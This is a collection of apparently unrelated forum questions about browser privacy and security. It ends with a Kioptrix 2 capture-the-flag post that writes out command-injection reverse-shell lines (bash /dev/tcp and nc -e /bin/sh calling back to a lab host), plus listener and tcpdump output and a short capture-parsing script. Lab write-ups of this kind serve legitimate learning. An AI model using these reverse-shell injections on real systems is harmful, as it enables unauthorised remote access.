How safe is opening any website on new browser tab?

When I do online shopping where I use my credit card information to purchase, I clear the browser cache, cookies and only open that single site. After I am done, I again clear the cache, cookies and start with my regular browsing. I do this to ensure any other websites that I open on a new tab do not sneak into my credit card information. Is this even possible or just a myth?

So if I wish to open "any" site on a new tab while doing my online shopping, is it safe or do I have to clear cookies every time and open only one site?

How do I stop an Image Address from loading in the Browser?

Ultimately, I want to be able to disable the Right Click option across a website I am working on. I have managed to disable this across the Blog Content and all of the Images that appear within the Blog.

I have noticed that when you enter the Image address directly into the Browser, the Right Click still works. I have tried modifying the Code Snippets I have, as well as various Plugins, but nothing seems to work. Would it be a case that it is not possible to disable the Right Click option when loading the original image, by entering its Image address into the Browser?

Assuming this is the case, is it possible to prevent the Image from loading when entering the Image Address directly within the browser?

If there is a way, would this prevent the image from loading in Blog Posts etc too?

Tor Browser: Could a website or ISP detect modification to DOM done by users if Javascript is disabled?

I have Tor Browser (which is basically Firefox ESR) on "Safest" setting (Javascript disabled). We’re generally scolded about using extensions in it, as they can alter web traffic patterns to or from your browser, adding another fingerprinting vector by distinguishing you from other Tor Browser users.

If JS is turned off even in vanilla Firefox, and I apply modifications to the DOM (like CSS mods, zooming in etc.) after the website has finished loading, I can’t see how a website or ISP could detect what the user is doing in the DOM.

I know if you, for example, hide an element in CSS before it is fully loaded (such as the sidebar), the browser may skip downloading resources (such as icons) associated with the element. This would distinguish your web traffic patterns from other users. That’s why I wait till the page is fully loaded. I’m also careful to not trigger CSS media queries which can be set up to connect to a remote URL if triggered (or remove them first if they will be triggered).

I think the above should be enough to avoid distinguishing myself by my web traffic. Do you see any way I could be distinguished with only CSS & HTML?

More secure to use e.g. Services in Rambox than in browser or native clients?

Same question is asked for More secure to use e.g. Whatsapp Web in Franz than in browser? [closed].

In its answer it is said that:

No, Franz is not inherently more secure than a regular browser.

In an ordinary web application the impact of this XSS flaw would have been restricted to that particular domain, but in a desktop application it endangers the host itself.


In its answer’s comment it is mentioned that Rambox.pro is an open source alternative.

==> I was wondering, would Rambox.pro be secure to use like a regular browser or their native clients? Or does it have any security holes like Franz has?

Is there an actual web browser “in the works”? [closed]

There are no web browsers left (for Windows/non-Macs). Chrome and Firefox are both pure spyware to the point where they are utterly unusable. 100% of all other browsers except for Safari (Mac-only) are "skins" on top of those same compromised softwares.

I’ve looked long and hard but there just seems to be no browser left. It feels absurd to type that, but it’s the truth. I’m typing this from Pale Moon, which is a Firefox fork, and other than Tor browser (also a Firefox fork and only usable for .onions), I simply cannot find any browser to install on my system.

There just is no usable browser left.

Pale Moon is a nightmare to use for YouTube, Twitch or shopping food. I have to wait for many seconds for each page to sluggishly load, and every click and scroll takes an eternity. There’s constant issues with videos and streams breaking in various ways, start repeating, or just generally load at turtle speed, unrelated to connection issues. (And this is a monster PC, so it’s definitely not related to local performance.)

Pale Moon is also very broken (just like Firefox) in terms of specifying a profile to use when opening a URL from the command line/script, and the same goes for "private browsing mode" which it ignores entirely. It’s basically an unmaintained, rotting mess. It’s so broken that it’s not even meaningful to call it a "browser", frankly.

No, Chromium, Vivaldi, "Brave", "Opera", "Edge" etc. are not browsers. They are skins on the same compromised Chrome spy tech. The only possible way to make a browser is to do what Opera did until 2012: actually make it. Not take an existing piece of code which you have zero control over and slap your logo on it, pretending that it’s a browser. It’s not. It’s a skin on top of Google’s or Mozilla’s junk.

I have zero confidence left in either Google or Mozilla. I will never use anything made by or depending on them.

And please, don’t make any tongue-in-cheek recommendation for Lynx or Links: http://links.twibright.com/download.php That page is like a cruel joke.

Frankly, I already know the answer to my own question: "no". There is no browser. All there is is Chrome and Firefox, and both are literally unusable.

I truly cannot understand how there can exist people who claim that Mozilla is somehow "fighting evil" when they are the evil. Maybe they run Linux and their distro has put heavy modifications on their Firefox package; that’s the only explanation I can think of. Try it on Windows, or just "unmodified" from Mozilla, and you will start crying.

And no, Chromium is not "Chrome without the spying".

What I don’t understand is what all these intelligent people could possibly be using. They seem to be all using Chrome, somehow ignoring all the spying. It’s like I’ve ended up in some parallel dimension or something.

Seriously: this is not a "rant". What do you suggest other than "stop using computers entirely", which I’d love to do but isn’t practically possible in my situation?

Will anyone figure out who I am if I am downloading a torrent while logged in to Facebook in my browser?

I have ProtonVPN. I am downloading torrents. I don’t want anyone to know that I am downloading torrents. I am also logged in to Facebook in my browser. So Facebook knows my VPN IP.

And my ISP knows the IP from which I am downloading stuff using UDP.

Will someone be able to figure out who I am from these sources?

Call Master – Free browser based video calling ( $10 Reserve )

Hi,
I want to sell my browser based video calling website.
The site: callmaster.live
Info:
Call Master is a Free browser based video calling site for everyone.
[Short Description]
Website does not generate income yet. The script is great and customizable. Owner can add ads to the video chat window to get hours of impressions per call.

[Best features]

  1. Site allows users to video call for free directly in the browser
  2. Website is easy to transfer with HEROKU:…

Kioptrix 2: Why doesn’t a netcat reverse shell executed in the web browser via a command injection bug work?

I’ve completed the Kioptrix Level 2 challenge via a bash reverse shell.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1 

My question is: why doesn’t the netcat reverse shell work when executed in the web browser via the command injection bug, when it was working just fine via the terminal?

My Setup

Kali - 10.10.13.37
Kioptrix 2 - 10.10.13.254

netcat listener

kali@kali:~$   nc -lp 4444 

I’ve verified tcp port 4444 is open

kali@kali:~$   ss -antp | g 4444
LISTEN 0      1            0.0.0.0:4444         0.0.0.0:*     users:(("nc",pid=3003,fd=3))
kali@kali:~$

netcat reverse shell executed in web browser via command injection bug doesn’t work

; nc 10.10.13.37 4444 ; nc 10.10.13.37 4444 -e /bin/sh 

No traffic at all

kali@kali:~$   sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes

However, when I repeat the same process with netcat executed on Kioptrix 2 terminal, I was able to get the reverse shell setup on Kali.

[backdoor@kioptrix ~]$   nc 10.10.13.37 4444 -e /bin/sh 

Reverse shell via terminal is working fine

kali@kali:~$   nc -lp 4444
id
uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor)

tcpdump traffic, the last 4 packets were for id command

kali@kali:~$   sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0
00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0
00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0
00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3
00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0
00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97
00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0
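Reading the capture above from the monitoring side, as an added example that is not part of the original post: the script parses the seven tcpdump lines, finds which host sent the bare SYN, and totals the payload bytes in each direction. The function names `parse` and `summarize` are this example's own; the packet lines and the `id` output are copied from the post.

```python
import re
# The seven packets from the capture in the post above, copied verbatim.
CAPTURE = """\
00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0
00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0
00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0
00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3
00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0
00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97
00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0
"""

PACKET = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\S+)\.(?P<sport>\d+) > (?P<dst>\S+)\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[^\]]*)\].*length (?P<length>\d+)$"
)

# Output of `id` as shown in the listener session in the post.
ID_OUTPUT = ("uid=502(backdoor) gid=502(backdoor) "
             "groups=0(root),10(wheel),500(john),501(harold),502(backdoor)")

def parse(capture):
    """Turn tcpdump text into packet dicts; lines that are not packets are skipped."""
    packets = []
    for line in capture.splitlines():
        m = PACKET.match(line.strip())
        if m:
            pkt = m.groupdict()
            pkt["length"] = int(pkt["length"])
            packets.append(pkt)
    return packets

def summarize(packets):
    """Report which side opened the connection and the payload bytes sent each way."""
    syn = next(p for p in packets if p["flags"] == "S")  # bare SYN marks the initiator
    result = {
        "initiator": (syn["src"], int(syn["sport"])),
        "listener": (syn["dst"], int(syn["dport"])),
        "to_listener": 0,
        "to_initiator": 0,
    }
    for p in packets:
        direction = "to_listener" if p["src"] == syn["src"] else "to_initiator"
        result[direction] += p["length"]
    return result

if __name__ == "__main__":
    print(summarize(parse(CAPTURE)))
```

The 3 bytes sent to the initiator match `id` plus a newline, and the 97 bytes sent back match the `id` output plus a newline, which is consistent with the post's remark that the last four packets were for the `id` command.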